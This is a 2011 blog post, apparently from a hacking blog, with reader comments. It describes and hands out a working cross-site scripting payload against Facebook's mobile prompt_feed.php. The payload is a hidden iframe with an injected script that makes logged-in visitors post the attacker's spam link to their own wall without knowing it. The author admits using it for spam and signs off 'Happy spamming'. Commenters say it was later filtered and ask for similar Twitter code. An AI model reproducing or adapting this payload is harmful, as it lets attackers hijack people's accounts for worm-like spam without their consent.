March 28, 2011
Autopost Spamming using Facebook Mobile XSS
Posted by: Joy : Category: Facebook Tips, Vulnerability
What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection.
Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :
<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
That’s all. Happy spamming 
March 30th, 2011 at 6:31 pm
Please try again later
Udah Tidak bisa lagi gan
March 30th, 2011 at 11:21 pm
it’s filtered now :
http://crazydavinci.net/2011/03/statement-of-apology/#comment-2611
April 5th, 2011 at 4:20 am
I think there is another spamming method…
look here
http://img695.imageshack.us/i/53203773.png
April 5th, 2011 at 1:46 pm
if someone post on the group the victim will automatically first comment in 2 times
spoiler
http://img695.imageshack.us/i/53203773.png
how to stop it joy??
April 5th, 2011 at 5:20 pm
alo om, bisa ga autopostnya di twitter
jadi tiap ada yang kunjung update status di twiternya.. . .
April 6th, 2011 at 5:26 pm
@zhelin
where is the group url? the image is not clear i cant see what’s really goin on there…
@kemalzack
nanti diliat2 lg bro..
wah iya, lom oprek2 twitter, dah lama juga
baru sebatas update via
April 8th, 2011 at 8:50 am
joy here http://www.facebook.com/home.php?sk=group_199940393355692&ap=1
if you try to post you will noticed it
April 10th, 2011 at 1:46 pm
ok will try later, i’m gona make a new post first.. hhe..
April 19th, 2011 at 8:21 am
Brada can you make a code kie auto share by using this code: http://www.facebook.com/sharer.php?u=http://crazydavinci.net/2011/03/autopost-spamming-using-facebook-mobile-xss/#more-1307
April 22nd, 2011 at 12:44 am
ah yes,,, really sorry. even if i know how, i dont think i would share some kind of autopost/share code again as many malicious coder out there would abuse it again just like before.